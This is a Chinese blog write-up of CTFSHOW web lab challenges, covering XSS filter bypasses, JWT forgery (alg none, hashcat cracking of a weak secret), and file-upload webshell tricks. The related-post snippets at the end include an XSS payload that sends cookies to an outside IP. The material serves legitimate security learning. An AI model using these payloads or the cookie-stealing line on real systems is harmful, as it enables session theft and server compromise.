CTFSHOW-Web入门题解(后续题目更新在主页不同的漏洞专题)

已于 2024-07-17 15:32:56 修改
阅读量438 收藏 4
点赞数 9
分类专栏: CTF 文章标签: 网络安全 web安全 经验分享
于 2024-03-18 21:10:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/asmartrman/article/details/136803755
版权
本文介绍了CTFSHOWWeb入门题目的解决方案,包括信息收集技巧、跨站脚本(XSS)绕过方法、处理JWT认证、文件上传漏洞利用以及如何破解简单的JWT签名。
摘要由CSDN通过智能技术生成

请添加图片描述

CTFSHOW-Web入门题解(更新中)

信息收集

web1

F12查看源代码即可
在这里插入图片描述

web2

提示js前台拦截 === 无效操作
同时无法查看源代码
在这里插入图片描述
根据提示,我们禁用js。这里可以使用插件,javascript switch
在这里插入图片描述
之后刷新就能查看了
在这里插入图片描述
或者在url前拼接view-source:
在这里插入图片描述

XSS

以下题目均需要使用xss平台获取Cookie,这里为了学习演示只弹窗
这里可以看这位大佬的博客,很详细:https://veo.pub/2019/xsscode/#

web316

在这里插入图片描述
直接输入即可弹窗

web317

script标签好像被过滤了,用img
在这里插入图片描述

web318

过滤了img和script

<svg/οnlοad=alert(1)>

在这里插入图片描述

web319

一样用svg即可

<svg/οnlοad=alert(1)>

在这里插入图片描述

web320

同上(后来才发现320-322过滤了空格,但是我都用的没有空格的代码,也就是用’/'代替空格所以都能绕过,师傅们做的时候注意一下就好)
在这里插入图片描述

web321

同上
在这里插入图片描述

web322

同上

web323

JWT

web345

提示在admin目录下
在这里插入图片描述
访问/admin会直接跳转到index,可能是因为没有权限,我们将数据包中的auth进行jwt解密
在这里插入图片描述
提示不是一个jwt格式,是怎么回事呢,观察可以发现这个auth只有两个部分,也就是缺少了signature,只需要将payload中的user改为admin即可
在这里插入图片描述
这里的加密算法因为是none,所以我们没法直接在网站上加密,不过只需要把payload拿出来bse64解密之后,将user改为admin再加密,最后和原头拼接一下即可
在这里插入图片描述
最后结果:

eyJhbGciOiJIUzI1NiIsInR5cCI6Imp3dCJ9.W3siaXNzIjoiYWRtaW4iLCJpYXQiOjE3MTI5MTMwMzcsImV4cCI6MTcxMjkyMDIzNywibmJmIjoxNzEyOTEzMDM3LCJzdWIiOiJhZG1pbiIsImp0aSI6IjMwNjk4ODlmYWE1MDA1ZDQ2NDM0NTE2ZTE1ZGU1NTY2In1dAA==

在这里插入图片描述

web356

一样访问admin,这次jwt三部分倒是齐了
在这里插入图片描述
尝试删除signature并将header头中的加密方式改为none,同时将payload中的user改为admin
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功,记得即使删除了signature也要在最后留个 .

web347

jwt中的signature是由密钥加密得来的,如果密钥太过简单就有可能被爆破
这里使用vmware自带的hashcat工具进行爆破

# hashcat -a 0 -m 16500 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTcxMjkzMDM2OCwiZXhwIjoxNzEyOTM3NTY4LCJuYmYiOjE3MTI5MzAzNjgsInN1YiI6InVzZXIiLCJqdGkiOiIyODYxOTNiYTZhYWQ0NDBkM2E5OGYzMjI4MDI3M2ZlZiJ9.ECpkvwb1NZLUyaXK0WprgQAWQtMXsURIUYfet2PVJaY scretlist.txt

得到密钥123456,利用jwt.io加密即可
在这里插入图片描述
在这里插入图片描述

文件上传

web151

上传后bp改后缀为php即可
请添加图片描述
在html文件夹下找到flag
请添加图片描述

web152

这道题后台校验了content-type,所以还是一样上传jpg改后缀即可
请添加图片描述

web153

利用上传.user.ini文件,令图片马能够被index.php包含执行(这里访问/upload文件夹发现可以访问,说明有一个index.php)
请添加图片描述

之后上传一个内容为一句话木马的jpg文件
请添加图片描述
之后蚁剑连接upload/index.php即可(测试了一下上传.htaccess文件好像不行,有没有师傅知道麻烦解惑~

Wine_Jar
关注
专栏目录
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 981
任务环境说明:服务器场景:Server1。
CTFSHOW WEB题目
qq_45655564的博客
08-09 2932
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
ctfshow
PUTAOAO的博客
08-12 203
crypto2_月自圆 已知m长为71 加密后长度为142 flag在m中第53位置则在密文中105的位置刚好是salt的位置 可以爆破salt和a f ⇒ 1c l ⇒ 29 a ⇒ 56 g ⇒ 66 from itertools import * from random import * from string import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(
ctfshow~VIP限免题目20道(保姆级解析)
最新发布
m0_75030189的博客
07-17 1305
ctfshow~VIP限免题目保姆级解析,感觉都过一遍确实也简单梳理了一些长时间不看忘了的知识点,如果文章有错误,欢迎大家批评指正!(又菜又爱玩的海鸥先生)
ctf.show
giaogiao123的博客
02-15 265
进入页面首先看到一个题目看hint ?cmd 有了源码 看大佬的笔记这是一个php短标签,正则匹配 考虑绕过 ?cmd=?><?=`/???/?p /???????? p.p`;?> 然后出现文件下载,咱也不知道为撒,反正师傅都是这么写的,让我学明白了在更。 ...
CTFShow Web 入门 XSS
tj13995958709的博客
04-14 2036
这一题用上一题的做法就不行,这一题admin的cookie是一直在变的,而且很快,看到此题还有修改密码的功能,注册个普通账号,在修改密码时抓包。当将这行脚本代码提交后,稍等片刻,会有个类似admin管理员的程序每隔一段时间就查看我们提交的连接,然后就可以拿到admin的cookie。这道题它代码逻辑有问题,转账的不扣转账方的金额,所以可以一直向自己转账,转的金额不超过自己余额即可。直接让admin转自己10000,和上题让admin自己改密码思路是一样的。然后登录admin账号,密码输入123456。
ctfshow--web入门题目1-20
weixin_50888622的博客
11-16 1731
web-1 where is flag? 此题直接点击F12,查看其源代码就可以找到flag ctfshow{1121142c-011b-43e7-9268-7bc9b5024a75} 2.web-2无法查看源代码: 从更多工具里面有一个开发人员工具,打开点击索引就可以找到flag ctfshow{d73c7c81-36de-42e9-bbc5-13a9b2a80677} web-3 第一种方法:在打开链接后发现还是where is flag 通过F12,在网络里面的响应头里面发现了flag c.
2024年CTFSHOW-Web入门题解更新中)
2401_84252743的博客
05-01 546
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种安全挑战,包括Web漏洞利用、密码学、逆向工程等。这里的"菜狗杯"可能是指比赛的昵称或名称,暗示这是一个初级到中级难度的竞赛,适合新手和进阶者参与。 ...
ctfshow web入门题解(一) web1-10
weixin_48604668的博客
07-26 1704
ctfshow靶场的web vip题解前10道
ctfshow web入门题解(二) web11-20
weixin_48604668的博客
08-01 1380
ctfshow的vip题解 希望对各位师傅有所帮助
ctfshow web入门全部答案-信息收集【后续持续更新中】
cx17775140296的博客
05-07 389
vim在编辑文件时,是在workbuffer中进行的,缓存中的信息有存放在.swp文件(原文件名加.swp结尾的文件),当连接异常断开,缓存中的信息丢失,但.swp文件依然存在,可以通过这个文件来进行数据恢复。robots.txt是爬虫界一个约定俗成的协议,里面限制了被爬虫爬取的范围,如果没有该文件说明所有内容都可被爬取。直接输入密文为密码时错的,抓包后密文会变成别的密文,再将密文重新修改成原来的密文即可。输入账号admin,密码为邮箱,可以看到密码错误,说明账号存在。访问后台地址并输入账号密码即可。
CTFshow-WEB入门-XSS
feng的博客
02-28 6615
前言 因为不太会javascript,所以对于xss的了解一直比较少,也不太会,这次做一下xss专题,学习一下xss。 web316 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! 意思是要生成链接,应该就还是获得管理员cookie这样的题目,大师傅们说题目的bot是每隔一段时间自动点击的。 可以利用xss平台: XSS平台 以后我都用自己vps。 首先测试一下<script>alert(1)</script>,弹窗成功,第一题应该是没有任何的过滤,所以直接打co
ctfshow web入门 xss篇
jie_a的博客
05-31 903
web316-web326 首先用xss平台实验了下 没有flag,群主说要生成连接,然后后台会有个机器人点一下 呢咱们就生成连接 <input onfocus="window.open('http://121.4.162.152:8888/'+document.cookie)" autofocus> 然后用咱们的vps监听端口 然后flag 就出来了 详细绕过姿势看这个大佬博客 <body onload="window.location.href='http://121.4.16
ctfshow Nodejs
weixin_63231007的博客
03-08 732
承接上文nodejs原型链漏洞刷题练习
ctfshow(刷题经历)
qq_62046696的博客
06-26 1676
1、打开以后看见filename=后面感觉是一个base64编码,接着解码一下,发现等于keys.txt,通常的源文件应该是index.php2、对index.php进行base64编码并作为新的filename的参数3、查看源文件,其里line变量起到控制行数的作用: http://114.67.246.176:13972/index.php?line=1&filename=aW5kZXgucGhw发现爆出了第一行隐含的代码,4、编写python脚本,查看全部源码 这样代码就出来了下图:5、分析PH
CTFshow web1
羽的博客
02-26 6101
题目地址:https://ctf.show 扫描后台拿到源码(www.zip)。打开login.php能禁的基本都禁干净了,登录页面貌似没有注入的可能。reg.php也是如此,所以注册页面也没可能了。剩下最后一个就是显示信息的页面了。这里可以看到在数据库中是把所有的字段(包括密码)都给查出来了,但是没有显示密码的地方。 我们可以利用?order=pwd来判断注册的密码与flag用户密码的大小(...
CTF show WEB14
羽的博客
02-18 2794
题目地址:https://ctf.show 对于这个题第一个坑要过的话必须得了解php的switch case语句。 在这里举个例子: $number=1; switch ($number) { case "1": echo "one"; case "2": echo "two"; case "3" echo "three"...
2020 CSP-J2/CSP-S2复赛题解精华:竞赛回顾与解题策略
2020年的CSP-J2和CSP-S2复赛题解是一系列针对青少年编程能力挑战的比赛题目解答集合。CSP-J,即初级认证,主要面向入门组和普及组的学生,强调基础算法和逻辑思维。CSP-S则可能是高级认证,涉及到更深入的数据结构、...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值